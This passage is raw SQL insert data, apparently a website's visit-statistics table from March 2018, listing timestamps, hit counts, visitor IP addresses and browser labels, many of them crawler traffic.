(218341,1520686479,1,1,0,0,'54.210.1.251','other'),(218342,1520686601,1,1,0,0,'217.69.133.230','other'),(218343,1520686605,2,2,0,0,'91.196.178.1','chrome'),(218344,1520686623,1,1,0,0,'54.36.148.255','other'),(218345,1520686679,1,1,0,0,'54.36.148.34','other'),(218346,1520686754,1,1,0,0,'34.232.77.215','other'),(218347,1520686768,2,2,0,0,'91.209.11.236','other'),(218348,1520686953,1,0,1,0,'66.249.66.199',''),(218349,1520687111,1,1,0,0,'52.87.153.3','other'),(218350,1520687152,1,1,0,0,'54.36.149.77','other'),(218351,1520687407,1,1,0,0,'54.210.1.251','other'),(218352,1520687610,1,1,0,0,'52.91.120.227','other'),(218353,1520687614,1,1,0,0,'54.36.148.139','other'),(218354,1520687656,1,1,0,0,'34.232.77.215','other'),(218355,1520687742,1,1,0,0,'216.244.66.237','other'),(218356,1520687872,1,1,0,0,'54.36.148.133','other'),(218357,1520687889,1,1,0,0,'54.36.148.26','other'),(218358,1520688085,2,2,0,0,'91.209.11.236','other'),(218359,1520688181,1,1,0,0,'52.87.153.3','other'),(218360,1520688309,1,1,0,0,'54.210.1.251','other'),(218361,1520688576,1,1,0,0,'34.232.77.215','other'),(218362,1520688711,1,1,0,0,'54.36.148.222','other'),(218363,1520688878,1,1,0,0,'52.91.120.227','other'),(218364,1520688912,1,1,0,0,'54.36.148.52','other'),(218365,1520689005,1,1,0,0,'54.36.149.77','other'),(218366,1520689140,1,1,0,0,'52.87.153.3','other'),(218367,1520689314,1,1,0,0,'54.210.1.251','other'),(218368,1520689601,1,1,0,0,'34.232.77.215','other'),(218369,1520689659,1,1,0,0,'54.36.148.143','other'),(218370,1520689769,1,1,0,0,'141.8.142.74','other'),(218371,1520689774,2,2,0,0,'87.250.224.46','other'),(218372,1520689924,1,0,1,0,'66.249.66.199',''),(218373,1520690031,1,1,0,0,'52.91.120.227','other'),(218374,1520690228,1,1,0,0,'54.210.1.251','other'),(218375,1520690249,1,0,1,0,'66.249.66.158',''),(218376,1520690262,1,1,0,0,'54.36.148.134','other'),(218377,1520690502,1,1,0,0,'54.36.148.112','other'),(218378,1520690588,1,1,0,0,'54.36.148.214','other'),(218379,1520690687,1,1,0,0,'34.232.77.215','other'),(218380,1520690738,1,1,0,0,'54.36.148.132','other'),(218381,1520690784,1,1,0,0,'66.249.66.195','chrome'),(218382,1520690953,1,1,0,0,'66.249.66.157','chrome'),(218383,1520691138,1,1,0,0,'54.210.1.251','other'),(218384,1520691199,2,2,0,0,'216.244.66.246','other'),(218385,1520691414,1,1,0,0,'54.36.148.131','other'),(218386,1520691482,1,0,1,0,'66.249.66.201',''),(218387,1520691554,1,1,0,0,'193.194.127.222','firefox'),(218388,1520691616,1,1,0,0,'34.232.77.215','other'),(218389,1520691637,1,1,0,0,'52.87.153.3','other'),(218390,1520691790,1,1,0,0,'54.36.148.237','other'),(218391,1520692050,1,1,0,0,'54.210.1.251','other'),(218392,1520692241,1,1,0,0,'87.250.224.46','other'),(218393,1520692245,1,1,0,0,'37.9.113.115','other'),(218394,1520692536,1,1,0,0,'34.232.77.215','other'),(218395,1520692582,1,1,0,0,'180.76.15.140','other'),(218396,1520692805,1,1,0,0,'91.209.11.236','other'),(218397,1520693017,1,1,0,0,'54.210.1.251','other'),(218398,1520693096,1,1,0,0,'54.36.149.66','other'),(218399,1520693449,1,1,0,0,'34.232.77.215','other'),(218400,1520693767,3,0,3,0,'66.249.66.195',''),(218401,1520693922,1,1,0,0,'54.36.148.230','other'),(218402,1520693941,1,1,0,0,'54.210.1.251','other'),(218403,1520693952,1,1,0,0,'193.194.127.222','firefox'),(218404,1520694036,1,1,0,0,'54.36.148.251','other'),(218405,1520694136,1,1,0,0,'216.244.66.237','other'),(218406,1520694360,1,1,0,0,'34.232.77.215','other'),(218407,1520694414,1,1,0,0,'77.111.246.8','chrome'),(218408,1520694545,1,1,0,0,'54.36.148.36','other'),(218409,1520694552,1,1,0,0,'87.250.224.46','other'),(218410,1520694574,1,1,0,0,'217.69.133.237','other'),(218411,1520694725,1,1,0,0,'207.46.13.49','other'),(218412,1520694759,1,0,1,0,'66.249.66.157',''),(218413,1520694848,1,1,0,0,'54.210.1.251','other'),(218414,1520694944,1,1,0,0,'52.87.153.3','other'),(218415,1520694999,1,1,0,0,'54.36.149.37','other'),(218416,1520695108,1,0,1,0,'66.249.66.201',''),(218417,1520695227,1,1,0,0,'8.29.198.26','other'),(218418,1520695272,1,1,0,0,'34.232.77.215','other'),(218419,1520695324,1,1,0,0,'54.36.148.93','other'),(218420,1520695357,1,1,0,0,'54.36.148.241','other'),(218421,1520695459,1,1,0,0,'178.154.171.88','other'),(218422,1520695554,1,1,0,0,'54.36.148.210','other'),(218423,1520695749,1,1,0,0,'54.210.1.251','other'),(218424,1520696059,1,1,0,0,'52.87.153.3','other'),(218425,1520696064,1,0,1,0,'66.249.66.199',''),(218426,1520696066,1,1,0,0,'87.250.224.46','other'),(218427,1520696196,1,1,0,0,'34.232.77.215','other'),(218428,1520696286,1,1,0,0,'66.249.66.195','chrome'),(218429,1520696335,1,1,0,0,'54.36.149.59','other'),(218430,1520696347,1,1,0,0,'66.249.66.157','chrome'),(218431,1520696348,2,2,0,0,'91.209.11.236','other'),(218432,1520696582,1,1,0,0,'54.36.149.21','other'),(218433,1520696651,1,1,0,0,'54.210.1.251','other'),(218434,1520696945,1,1,0,0,'54.36.148.191','other'),(218435,1520697123,1,1,0,0,'34.232.77.215','other'),(218436,1520697233,2,2,0,0,'141.8.142.74','other'),(218437,1520697560,1,1,0,0,'54.210.1.251','other'),(218438,1520697640,1,1,0,0,'54.36.149.47','other'),(218439,1520697770,1,1,0,0,'54.36.148.175','other'),(218440,1520698024,1,1,0,0,'34.232.77.215','other'),(218441,1520698170,1,1,0,0,'54.36.148.204','other'),(218442,1520698180,1,1,0,0,'91.209.11.236','other'),(218443,1520698276,1,1,0,0,'87.250.224.46','other'),(218444,1520698467,1,1,0,0,'54.210.1.251','other'),(218445,1520698481,1,1,0,0,'54.36.148.92','other'),(218446,1520698700,1,1,0,0,'178.154.171.88','other'),(218447,1520698934,1,1,0,0,'34.232.77.215','other'),(218448,1520699007,1,1,0,0,'54.36.148.196','other'),(218449,1520699356,1,1,0,0,'54.36.148.180','other'),(218450,1520699394,1,1,0,0,'54.210.1.251','other'),(218451,1520699540,1,1,0,0,'54.36.148.64','other'),(218452,1520699565,1,1,0,0,'54.36.148.98','other'),(218453,1520699593,1,1,0,0,'217.69.133.253','other'),(218454,1520699622,1,1,0,0,'54.36.148.243','other'),(218455,1520699676,2,2,0,0,'178.154.171.88','other'),(218456,1520699767,1,1,0,0,'54.36.148.140','other'),(218457,1520699860,1,1,0,0,'54.36.149.100','other'),(218458,1520699922,2,2,0,0,'141.8.142.74','other'),(218459,1520699953,1,1,0,0,'54.36.148.126','other'),(218460,1520699957,1,1,0,0,'91.209.11.236','other'),(218461,1520699985,1,0,1,0,'66.249.66.201',''),(218462,1520699990,1,1,0,0,'85.195.118.42','chrome'),(218463,1520700037,1,1,0,0,'34.232.77.215','other'),(218464,1520700044,1,1,0,0,'54.36.149.94','other'),(218465,1520700222,1,1,0,0,'207.46.13.58','other'),(218466,1520700309,1,1,0,0,'54.210.1.251','other'),(218467,1520700456,1,1,0,0,'54.36.149.95','other'),(218468,1520700497,1,1,0,0,'54.36.148.57','other'),(218469,1520700502,1,1,0,0,'54.36.148.73','other'),(218470,1520700838,1,1,0,0,'37.9.113.182','other'),(218471,1520700962,1,1,0,0,'34.232.77.215','other'),(218472,1520701058,1,1,0,0,'180.76.15.153','other'),(218473,1520701231,1,1,0,0,'54.210.1.251','other'),(218474,1520701351,1,1,0,0,'54.36.148.209','other'),(218475,1520701434,1,1,0,0,'178.92.139.32','firefox'),(218476,1520701655,1,1,0,0,'54.36.148.146','other'),(218477,1520701759,1,1,0,0,'66.249.66.201','chrome'),(218478,1520701765,1,1,0,0,'66.249.66.156','chrome'),(218479,1520701806,1,1,0,0,'157.55.39.151','other'),(218480,1520701889,1,1,0,0,'34.232.77.215','other'),(218481,1520702047,1,1,0,0,'52.91.120.227','other'),(218482,1520702156,1,1,0,0,'54.210.1.251','other'),(218483,1520702166,1,1,0,0,'54.36.148.54','other'),(218484,1520702219,1,1,0,0,'91.209.11.236','other'),(218485,1520702490,1,1,0,0,'54.36.148.105','other'),(218486,1520702574,1,1,0,0,'54.36.148.35','other'),(218487,1520702790,1,1,0,0,'34.232.77.215','other'),(218488,1520703085,1,1,0,0,'54.210.1.251','other'),(218489,1520703149,1,0,1,0,'66.249.66.199',''),(218490,1520703167,1,1,0,0,'52.91.120.227','other'),(218492,1520703601,1,1,0,0,'91.209.11.236','other'),(218493,1520703636,1,0,1,0,'66.249.66.156',''),(218494,1520703710,1,1,0,0,'34.232.77.215','other'),(218495,1520703821,1,1,0,0,'54.36.148.106','other'),(218496,1520703999,1,1,0,0,'54.210.1.251','other'),(218497,1520704625,1,1,0,0,'34.232.77.215','other'),(218498,1520704922,1,1,0,0,'54.210.1.251','other'),(218499,1520705198,1,1,0,0,'91.209.11.236','other'),(218500,1520705477,1,0,1,0,'66.249.66.195',''),(218501,1520705544,1,1,0,0,'34.232.77.215','other'),(218502,1520705703,1,1,0,0,'107.167.104.66','other'),(218503,1520705827,1,1,0,0,'54.36.148.163','other'),(218504,1520705846,1,1,0,0,'54.210.1.251','other'),(218505,1520706082,1,1,0,0,'8.29.198.26','other'),(218506,1520706142,2,2,0,0,'91.209.11.236','other'),(218507,1520706305,1,1,0,0,'37.9.113.114','other'),(218508,1520706485,1,1,0,0,'54.36.148.138','other'),(218509,1520706519,1,1,0,0,'34.232.77.215','other'),(218510,1520706767,1,1,0,0,'54.210.1.251','other'),(218511,1520707208,1,1,0,0,'66.249.66.195','chrome'),(218512,1520707220,1,1,0,0,'66.249.66.157','chrome'),(218513,1520707262,1,1,0,0,'37.53.123.21','chrome'),(218514,1520707278,1,1,0,0,'141.8.142.74','other'),(218515,1520707431,1,1,0,0,'54.36.148.131','other'),(218516,1520707443,1,1,0,0,'34.232.77.215','other'),(218517,1520707547,2,2,0,0,'91.196.178.163','chrome'),(218518,1520707677,1,1,0,0,'54.210.1.251','other'),(218519,1520707725,1,1,0,0,'54.36.149.38','other'),(218520,1520708012,1,1,0,0,'91.209.11.236','other'),(218521,1520708374,1,1,0,0,'34.232.77.215','other'),(218522,1520708710,1,1,0,0,'54.36.148.225','other'),(218523,1520708934,1,1,0,0,'54.36.148.96','other'),(218524,1520708935,1,1,0,0,'31.202.112.183','firefox'),(218525,1520708940,1,0,1,0,'66.249.66.195',''),(218526,1520709062,1,1,0,0,'54.36.148.238','other'),(218527,1520709297,1,1,0,0,'34.232.77.215','other'),(218528,1520709442,1,1,0,0,'37.73.236.254','chrome'),(218529,1520709627,1,1,0,0,'54.36.148.252','other'),(218530,1520709658,1,1,0,0,'87.250.224.46','other'),(218531,1520709968,1,1,0,0,'54.36.148.139','other'),(218532,1520710132,1,1,0,0,'52.91.120.227','other'),(218533,1520710219,1,1,0,0,'34.232.77.215','other'),(218534,1520710413,1,1,0,0,'54.36.148.206','other'),(218535,1520710419,1,1,0,0,'54.36.148.254','other'),(218536,1520710514,1,1,0,0,'54.36.149.91','other'),(218537,1520710926,1,1,0,0,'54.36.148.212','other'),(218538,1520711143,1,1,0,0,'34.232.77.215','other'),(218539,1520711180,1,1,0,0,'54.36.149.37','other'),(218540,1520711252,1,1,0,0,'54.36.149.98','other'),(218541,1520711434,1,1,0,0,'54.36.149.100','other'),(218542,1520711574,1,1,0,0,'91.209.11.236','other'),(218543,1520712065,1,1,0,0,'34.232.77.215','other'),(218544,1520712352,1,1,0,0,'54.36.148.151','other'),(218545,1520712518,1,1,0,0,'91.209.11.236','other'),(218546,1520712561,1,0,1,0,'66.249.66.158',''),(218547,1520712566,2,0,2,0,'66.249.66.156',''),(218548,1520712822,1,1,0,0,'217.69.133.216','other'),(218549,1520712979,1,1,0,0,'34.232.77.215','other'),(218550,1520713399,1,1,0,0,'54.36.148.144','other'),(218551,1520713459,1,1,0,0,'91.209.11.236','other'),(218552,1520713512,1,1,0,0,'52.91.120.227','other'),(218553,1520713954,1,1,0,0,'34.232.77.215','other'),(218554,1520714509,1,1,0,0,'54.36.149.45','other'),(218555,1520714554,1,1,0,0,'141.8.142.74','other'),(218556,1520714619,1,1,0,0,'54.36.149.87','other'),(218557,1520714644,1,1,0,0,'52.91.120.227','other'),(218558,1520714645,1,1,0,0,'54.36.149.63','other'),(218559,1520714684,2,0,2,0,'66.249.66.199',''),(218560,1520714883,1,1,0,0,'34.232.77.215','other'),(218561,1520715641,1,1,0,0,'54.36.148.145','other'),(218562,1520715809,1,1,0,0,'34.232.77.215','other'),(218563,1520715953,1,0,1,0,'66.249.66.156',''),(218564,1520716088,1,1,0,0,'66.249.66.195','chrome'),(218565,1520716091,1,1,0,0,'66.249.66.157','chrome'),(218566,1520716295,1,1,0,0,'54.36.148.77','other'),(218567,1520716468,1,1,0,0,'194.88.220.18','chrome'),(218568,1520716735,1,1,0,0,'34.232.77.215','other'),(218569,1520716915,2,2,0,0,'141.8.142.74','other'),(218570,1520716920,1,1,0,0,'8.29.198.26','other'),(218571,1520716952,1,1,0,0,'54.36.148.53','other'),(218572,1520717190,1,1,0,0,'54.36.148.254','other'),(218573,1520717291,1,1,0,0,'109.206.58.176','firefox'),(218574,1520717351,1,1,0,0,'87.250.224.46','other'),(218575,1520717354,1,1,0,0,'178.154.171.88','other'),(218576,1520717506,1,1,0,0,'54.36.148.143','other'),(218577,1520717528,2,0,2,0,'66.249.66.158',''),(218578,1520717641,1,1,0,0,'54.36.148.14','other'),(218579,1520717662,1,1,0,0,'34.232.77.215','other'),(218580,1520717663,1,0,1,0,'66.249.66.156',''),(218581,1520717940,1,1,0,0,'54.36.149.43','other'),(218582,1520718013,1,0,1,0,'66.249.66.199',''),(218583,1520718416,1,1,0,0,'54.36.149.72','other'),(218584,1520718459,1,1,0,0,'141.8.142.74','other'),(218585,1520718512,1,1,0,0,'54.36.148.230','other'),(218586,1520718579,1,1,0,0,'34.232.77.215','other'),(218587,1520718703,1,1,0,0,'54.36.148.68','other'),(218588,1520719222,1,1,0,0,'54.36.149.28','other'),(218589,1520719272,1,1,0,0,'54.36.148.104','other'),(218590,1520719481,1,1,0,0,'34.232.77.215','other'),(218591,1520719671,1,1,0,0,'141.8.142.74','other'),(218592,1520719721,2,2,0,0,'87.250.224.46','other'),(218593,1520719818,1,1,0,0,'54.36.149.53','other'),(218594,1520720070,1,1,0,0,'207.46.13.58','other'),(218595,1520720073,1,1,0,0,'54.36.149.92','other'),(218596,1520720111,1,1,0,0,'54.36.148.103','other'),(218597,1520720146,1,1,0,0,'54.36.148.137','other'),(218598,1520720242,1,1,0,0,'54.36.149.61','other'),(218599,1520720296,1,1,0,0,'52.91.120.227','other'),(218600,1520720388,1,1,0,0,'34.232.77.215','other'),(218601,1520720398,1,1,0,0,'157.55.39.182','other'),(218602,1520720769,1,1,0,0,'54.36.148.94','other'),(218603,1520720989,1,1,0,0,'54.36.148.118','other'),(218604,1520721027,1,1,0,0,'54.36.149.72','other'),(218605,1520721100,1,1,0,0,'54.36.149.56','other'),(218606,1520721209,1,1,0,0,'54.36.148.136','other'),(218607,1520721303,1,1,0,0,'66.249.66.158','chrome'),(218608,1520721317,1,1,0,0,'34.232.77.215','other'),(218609,1520721347,1,1,0,0,'52.91.120.227','other'),(218610,1520721523,1,1,0,0,'54.36.148.215','other'),(218611,1520721542,1,1,0,0,'66.249.66.195','chrome'),(218612,1520722033,1,1,0,0,'216.244.66.237','other'),(218613,1520722210,1,1,0,0,'54.36.148.86','other'),(218614,1520722238,1,1,0,0,'34.232.77.215','other'),(218615,1520722427,1,1,0,0,'54.36.149.105','other'),(218616,1520722963,1,1,0,0,'54.36.148.159','other'),(218617,1520723067,1,1,0,0,'52.91.120.227','other'),(218618,1520723156,1,1,0,0,'34.232.77.215','other'),(218619,1520723267,1,1,0,0,'54.36.148.197','other'),(218620,1520723514,2,0,2,0,'66.249.66.195',''),(218621,1520723575,2,2,0,0,'141.8.142.74','other'),(218622,1520723875,1,1,0,0,'54.36.148.115','other'),(218623,1520723925,1,1,0,0,'54.36.148.140','other'),(218624,1520723960,1,0,1,0,'66.249.66.201',''),(218625,1520724077,1,1,0,0,'34.232.77.215','other'),(218626,1520724107,1,1,0,0,'52.91.120.227','other'),(218627,1520724577,1,1,0,0,'54.36.149.16','other'),(218628,1520724592,1,1,0,0,'54.36.148.50','other'),(218629,1520724678,1,1,0,0,'180.76.15.139','other'),(218630,1520724950,1,1,0,0,'54.36.148.64','other'),(218631,1520724993,1,1,0,0,'34.232.77.215','other'),(218632,1520725017,1,0,1,0,'66.249.66.158',''),(218633,1520725134,1,1,0,0,'66.249.66.157','chrome'),(218634,1520725209,1,1,0,0,'54.36.148.118','other'),(218635,1520725393,1,1,0,0,'141.8.142.74','other'),(218636,1520725587,1,1,0,0,'54.36.149.38','other'),(218637,1520725923,1,1,0,0,'34.232.77.215','other'),(218638,1520726190,2,2,0,0,'54.36.149.25','other'),(218639,1520726238,1,1,0,0,'54.36.148.127','other'),(218640,1520726469,1,1,0,0,'52.91.120.227','other'),(218641,1520726478,1,1,0,0,'54.36.148.95','other'),(218642,1520726555,1,0,1,0,'66.249.66.156',''),(218643,1520726579,1,1,0,0,'54.36.149.16','other'),(218644,1520726838,1,1,0,0,'34.232.77.215','other'),(218645,1520726916,2,2,0,0,'178.154.171.88','other'),(218646,1520727007,2,1,1,0,'66.249.66.201',''),(218647,1520727020,1,1,0,0,'216.244.66.246','other'),(218648,1520727164,1,1,0,0,'54.36.148.136','other'),(218649,1520727664,1,1,0,0,'52.91.120.227','other'),(218650,1520727756,1,1,0,0,'8.29.198.25','other'),(218651,1520727764,1,1,0,0,'34.232.77.215','other'),(218652,1520728695,1,1,0,0,'34.232.77.215','other'),(218653,1520728784,1,1,0,0,'52.91.120.227','other'),(218654,1520729331,1,1,0,0,'54.36.148.75','other'),(218655,1520729484,1,1,0,0,'54.36.149.24','other'),(218656,1520729514,1,1,0,0,'37.9.113.182','other'),(218657,1520729601,1,1,0,0,'34.232.77.215','other'),(218658,1520730018,1,1,0,0,'52.91.120.227','other'),(218659,1520730516,1,1,0,0,'34.232.77.215','other'),(218660,1520730682,1,1,0,0,'66.249.66.156','chrome'),(218661,1520730729,1,1,0,0,'54.36.148.155','other'),(218662,1520731158,1,1,0,0,'54.36.149.93','other'),(218663,1520731336,1,1,0,0,'52.91.120.227','other'),(218664,1520731438,1,1,0,0,'34.232.77.215','other'),(218665,1520731630,1,1,0,0,'217.69.133.229','other'),(218666,1520731675,1,1,0,0,'54.36.148.59','other'),(218667,1520731680,1,0,1,0,'66.249.66.201',''),(218668,1520732050,1,0,1,0,'66.249.66.156',''),(218669,1520732073,1,0,1,0,'66.249.66.199',''),(218670,1520732202,2,0,2,0,'66.249.66.195',''),(218671,1520732348,1,1,0,0,'34.232.77.215','other'),(218672,1520732372,1,1,0,0,'54.36.148.120','other'),(218673,1520732613,1,1,0,0,'66.249.66.201','chrome'),(218674,1520732699,1,1,0,0,'217.69.136.205','other'),(218675,1520732827,1,1,0,0,'141.8.142.74','other'),(218676,1520732871,1,1,0,0,'83.102.217.44','msie'),(218677,1520732997,1,1,0,0,'178.154.171.88','other'),(218678,1520733051,1,1,0,0,'87.250.224.46','other'),(218679,1520733058,1,1,0,0,'54.36.149.17','other'),(218680,1520733153,1,1,0,0,'54.36.149.43','other'),(218681,1520733257,1,1,0,0,'34.232.77.215','other'),(218682,1520733905,1,0,1,0,'66.249.66.195',''),(218683,1520733952,1,1,0,0,'54.36.149.32','other'),(218684,1520734173,1,1,0,0,'34.232.77.215','other'),(218685,1520734258,1,1,0,0,'54.36.149.15','other'),(218686,1520734280,1,1,0,0,'217.69.133.68','other'),(218687,1520734300,1,1,0,0,'54.36.148.33','other'),(218688,1520734640,1,1,0,0,'54.36.148.230','other'),(218689,1520734696,1,1,0,0,'54.36.148.120','other'),(218690,1520735082,1,1,0,0,'34.232.77.215','other'),(218691,1520735386,1,1,0,0,'54.36.148.50','other'),(218692,1520735427,1,1,0,0,'52.91.120.227','other'),(218693,1520735930,1,0,1,0,'66.249.66.195',''),(218694,1520736008,1,1,0,0,'34.232.77.215','other'),(218695,1520736634,1,1,0,0,'54.36.149.9','other'),(218696,1520736651,1,1,0,0,'54.36.148.53','other'),(218697,1520736655,1,1,0,0,'54.36.149.24','other'),(218698,1520736704,1,1,0,0,'54.36.148.47','other'),(218699,1520736822,1,1,0,0,'54.36.148.35','other'),(218700,1520736903,1,1,0,0,'54.36.149.33','other'),(218701,1520736974,1,1,0,0,'34.232.77.215','other'),(218702,1520737209,1,1,0,0,'54.36.148.96','other'),(218703,1520737484,1,1,0,0,'141.8.142.74','other'),(218704,1520737526,1,1,0,0,'54.36.148.211','other'),(218705,1520737545,1,0,1,0,'66.249.66.156',''),(218706,1520737685,1,1,0,0,'66.249.66.157','chrome'),(218707,1520737838,1,1,0,0,'66.249.66.201','chrome'),(218708,1520737882,1,1,0,0,'34.232.77.215','other'),(218709,1520738031,1,1,0,0,'216.244.66.246','other'),(218710,1520738593,1,1,0,0,'8.29.198.27','other'),(218711,1520738790,1,1,0,0,'34.232.77.215','other'),(218712,1520739353,1,1,0,0,'178.154.171.88','other'),(218713,1520739359,1,0,1,0,'66.249.66.199',''),(218714,1520739569,1,1,0,0,'95.24.206.183','chrome'),(218715,1520739570,1,1,0,0,'93.80.147.101','chrome'),(218716,1520739721,1,1,0,0,'34.232.77.215','other'),(218717,1520739936,1,0,1,0,'66.249.66.157',''),(218718,1520740177,1,1,0,0,'52.91.120.227','other'),(218719,1520740233,34,34,0,0,'5.102.0.10','other'),(218720,1520740625,1,1,0,0,'34.232.77.215','other'),(218721,1520740639,7,7,0,0,'141.8.142.74','other'),(218722,1520741161,1,0,1,0,'66.249.66.201',''),(218723,1520741480,1,1,0,0,'180.76.15.157','other'),(218724,1520741573,1,1,0,0,'34.232.77.215','other'),(218725,1520741630,2,2,0,0,'46.105.98.131','other'),(218726,1520742510,1,1,0,0,'34.232.77.215','other'),(218727,1520743221,1,1,0,0,'66.249.66.156','chrome'),(218728,1520743256,1,1,0,0,'66.249.66.201','chrome'),(218729,1520743382,1,1,0,0,'157.55.39.151','other'),(218730,1520743426,1,1,0,0,'34.232.77.215','other'),(218731,1520743621,1,1,0,0,'207.46.13.58','other'),(218732,1520743843,5,5,0,0,'144.76.185.181','other'),(218733,1520744351,1,1,0,0,'34.232.77.215','other'),(218734,1520744812,1,1,0,0,'157.55.39.4','other'),(218735,1520745269,1,1,0,0,'34.232.77.215','other'),(218736,1520745445,1,1,0,0,'158.69.254.103','other'),(218737,1520746180,1,1,0,0,'34.232.77.215','other'),(218738,1520746368,1,1,0,0,'217.69.133.191','other'),(218739,1520746473,1,1,0,0,'52.91.120.227','other'),(218740,1520746747,8,8,0,0,'141.8.142.74','other'),(218741,1520746890,1,1,0,0,'178.154.171.88','other'),(218742,1520747081,1,1,0,0,'34.232.77.215','other'),(218743,1520747454,1,0,1,0,'66.249.66.199',''),(218744,1520747524,1,0,1,0,'66.249.66.156',''),(218745,1520747609,1,1,0,0,'217.69.133.225','other'),(218746,1520747931,1,1,0,0,'52.91.120.227','other'),(218747,1520747995,1,1,0,0,'34.232.77.215','other'),(218748,1520748440,1,0,1,0,'66.249.66.157',''),(218749,1520748919,1,1,0,0,'34.232.77.215','other'),(218750,1520749192,1,0,1,0,'66.249.66.156',''),(218751,1520749212,1,1,0,0,'178.154.171.88','other'),(218752,1520749228,1,1,0,0,'217.69.133.219','other'),(218753,1520749387,1,1,0,0,'52.91.120.227','other'),(218754,1520749439,1,1,0,0,'8.29.198.26','other'),(218755,1520749862,1,1,0,0,'34.232.77.215','other'),(218756,1520750424,1,1,0,0,'66.249.66.156','chrome'),(218757,1520750430,1,1,0,0,'66.249.66.199','chrome'),(218758,1520750696,1,1,0,0,'52.91.120.227','other'),(218759,1520751307,1,1,0,0,'217.69.133.224','other'),(218760,1520751968,1,0,1,0,'66.249.66.195',''),(218761,1520752047,1,1,0,0,'52.91.120.227','other'),(218762,1520753016,1,1,0,0,'157.55.39.151','other'),(218763,1520753080,1,1,0,0,'217.69.136.207','other'),(218764,1520753360,1,0,1,0,'66.249.66.199',''),(218765,1520753747,1,0,1,0,'66.249.66.201',''),(218766,1520754397,1,1,0,0,'5.166.48.17','opera'),(218767,1520754508,1,1,0,0,'141.8.142.74','other'),(218768,1520754867,2,1,1,0,'66.249.66.195',''),(218769,1520755104,1,1,0,0,'217.69.136.206','other'),(218770,1520755406,1,0,1,0,'66.249.66.201',''),(218771,1520755763,1,0,1,0,'66.249.66.157',''),(218772,1520755911,1,1,0,0,'52.91.120.227','other'),(218773,1520756272,3,3,0,0,'141.8.142.74','other'),(218774,1520756412,1,1,0,0,'217.77.212.114','chrome'),(218775,1520756844,1,1,0,0,'188.230.43.254','other'),(218776,1520757161,2,2,0,0,'92.113.188.43','chrome'),(218777,1520757392,1,1,0,0,'141.8.142.74','other'),(218778,1520757398,1,1,0,0,'213.180.203.8','other'),(218779,1520758267,1,1,0,0,'217.77.212.114','chrome'),(218780,1520758280,1,1,0,0,'54.36.148.122','other'),(218781,1520758300,1,1,0,0,'207.46.13.58','other'),(218782,1520758922,1,0,1,0,'66.249.66.195',''),(218783,1520758945,1,1,0,0,'54.36.148.238','other'),(218784,1520759028,2,2,0,0,'141.8.142.74','other'),(218785,1520759068,1,1,0,0,'54.36.149.40','other'),(218786,1520759133,1,1,0,0,'66.249.66.157','chrome'),(218787,1520759144,1,1,0,0,'66.249.66.199','chrome'),(218788,1520760039,1,1,0,0,'85.195.118.42','chrome'),(218789,1520760288,1,1,0,0,'8.29.198.27','other'),(218790,1520760434,1,1,0,0,'85.195.118.42','firefox'),(218791,1520760574,1,1,0,0,'54.36.149.51','other'),(218792,1520761398,2,2,0,0,'178.154.171.88','other'),(218793,1520761894,1,1,0,0,'52.91.120.227','other'),(218794,1520761965,1,1,0,0,'5.3.135.112','chrome'),(218795,1520762287,1,1,0,0,'54.36.148.162','other'),(218796,1520762659,1,1,0,0,'54.36.148.99','other'),(218797,1520762681,1,1,0,0,'66.102.9.35','chrome'),(218798,1520762742,1,1,0,0,'141.8.142.74','other'),(218799,1520762842,1,1,0,0,'54.36.148.64','other'),(218800,1520762897,1,1,0,0,'52.91.120.227','other'),(218801,1520763054,1,0,1,0,'66.249.66.195',''),(218802,1520763065,1,1,0,0,'54.36.148.183','other'),(218803,1520763363,1,1,0,0,'54.36.148.24','other'),(218804,1520763847,58,58,0,0,'147.135.128.113','other'),(218805,1520763999,1,1,0,0,'91.195.244.47','chrome'),(218806,1520764184,1,1,0,0,'54.36.148.12','other'),(218807,1520764321,1,1,0,0,'87.250.224.46','other'),(218808,1520764464,1,1,0,0,'54.36.148.141','other'),(218809,1520764478,2,0,2,0,'66.249.66.158',''),(218810,1520764762,19,19,0,0,'147.135.128.113','other'),(218811,1520765059,1,1,0,0,'141.8.142.74','other'),(218812,1520765702,1,1,0,0,'217.69.133.251','other'),(218813,1520765801,1,1,0,0,'54.36.148.114','other'),(218814,1520765907,1,0,1,0,'66.249.66.156',''),(218815,1520766361,1,1,0,0,'54.36.149.11','other'),(218816,1520766836,1,0,1,0,'66.249.66.195',''),(218817,1520766945,1,1,0,0,'51.15.209.146','firefox'),(218818,1520767200,1,1,0,0,'54.36.148.254','other'),(218819,1520767377,1,1,0,0,'52.91.120.227','other'),(218820,1520767389,1,1,0,0,'54.36.149.104','other'),(218821,1520767417,1,1,0,0,'54.36.148.144','other'),(218822,1520767478,2,0,2,0,'66.249.66.201',''),(218823,1520767933,1,1,0,0,'54.36.148.127','other'),(218824,1520768214,1,1,0,0,'178.154.171.88','other'),(218825,1520768409,1,1,0,0,'87.250.224.46','other'),(218826,1520768533,1,1,0,0,'54.36.148.116','other'),(218827,1520768656,1,1,0,0,'66.249.66.195','chrome'),(218828,1520768662,1,1,0,0,'66.249.66.158','chrome'),(218829,1520769217,1,1,0,0,'54.36.148.225','other'),(218830,1520769526,1,1,0,0,'54.36.148.81','other'),(218831,1520769960,4,4,0,0,'178.154.171.88','other'),(218832,1520770230,2,2,0,0,'92.113.188.43','chrome'),(218833,1520770350,3,3,0,0,'141.8.142.74','other'),(218834,1520770962,1,1,0,0,'54.36.148.231','other'),(218835,1520770992,1,1,0,0,'178.154.171.88','other'),(218836,1520771053,1,1,0,0,'54.36.149.92','other'),(218837,1520771140,1,1,0,0,'8.29.198.27','other'),(218838,1520771242,1,1,0,0,'54.36.148.120','other'),(218839,1520771487,1,0,1,0,'66.249.66.156',''),(218840,1520771523,1,1,0,0,'54.36.148.202','other'),(218841,1520771694,1,1,0,0,'54.36.149.33','other'),(218842,1520771863,1,1,0,0,'54.36.149.63','other'),(218843,1520771882,2,2,0,0,'141.8.142.74','other'),(218844,1520771887,1,1,0,0,'54.36.149.88','other'),(218845,1520771970,1,1,0,0,'157.55.39.151','other'),(218846,1520772073,1,0,1,0,'66.249.66.201',''),(218847,1520772911,1,1,0,0,'54.36.149.11','other'),(218848,1520773055,1,1,0,0,'54.36.149.41','other'),(218849,1520773219,1,1,0,0,'157.55.39.146','other'),(218850,1520773455,1,1,0,0,'54.36.148.225','other'),(218851,1520773615,1,1,0,0,'54.36.148.128','other'),(218852,1520773625,2,2,0,0,'216.244.66.246','other'),(218853,1520773920,1,1,0,0,'217.69.133.240','other'),(218854,1520774049,1,1,0,0,'54.36.148.226','other'),(218855,1520774645,2,0,2,0,'66.249.66.158',''),(218856,1520775354,1,0,1,0,'66.249.66.199',''),(218857,1520775436,1,1,0,0,'54.